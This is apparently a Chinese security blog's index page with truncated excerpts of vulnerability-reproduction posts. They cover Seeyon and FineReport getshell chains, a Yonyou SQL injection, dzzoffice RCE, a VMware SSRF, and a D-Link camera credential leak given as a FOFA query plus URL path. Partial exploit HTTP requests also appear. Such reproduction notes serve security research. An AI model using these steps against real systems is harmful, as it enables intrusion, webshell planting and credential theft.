首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25....
信息安全
用友 GRP-u8 SQL注入 漏洞复现
POST /Proxy HTTP/1.1 Host: 192.168.10.2:8025 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.1...
腾讯云云函数初探
云函数地址 https://console.cloud.tencent.com/scf 云函数开发文档 https://cloud.tencent.com/document/product/583/19806 一、新建云函数 选择...
帆软 V9 getshell
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&fi...
dzzoffice 前台RCE复现
一、环境安装 源代码: https://github.com/zyx0814/dzzoffice/releases/ 二、利用前提 首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这...
Java基础-JDBC的基本操作
由于自己的记性太差了。不写出来有时候真的太容易忘记了。基础文章。代码记录文不喜勿喷 一、JDBC简介 JDBC(Java Data Base Connectivity,java数据库连接)是一种用于执行SQ...
通过SSH 开启Socket5 代理
思路是再土司中看了一篇文章感觉挺有趣的。就跟着搭建了起来不过我的方向并不为了连接内网。而是一个做一个稳定的Socket5 为了能得到访问速度的提升。 一:在出口机器上面正向连接8...
Nginx_lua 100参数绕过原理详解
一、环境搭建 Nginx_lua 安装 https://github.com/openresty/lua-nginx-module#installation wget 'https://openresty.org/download/nginx-1.19.3.tar.gz' tar -xzvf nginx-...
VMware vRealize Operations Manager SSRF CVE-2021-21975漏洞复现
下载ova https://my.vmware.com/group/vmware/patch#search 下载完之后双击。然后导入虚拟机 然后进行访问 设置好密码然后设置为新环境 ...
D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078 复现
FOFA: app="D_Link-DCS-2530L" https://xxx.xxxx/config/getuser?index=0 然后登陆进去。即可看到监控了 参考:https://mp.weixin.qq.com/s/b7jyA5sylk...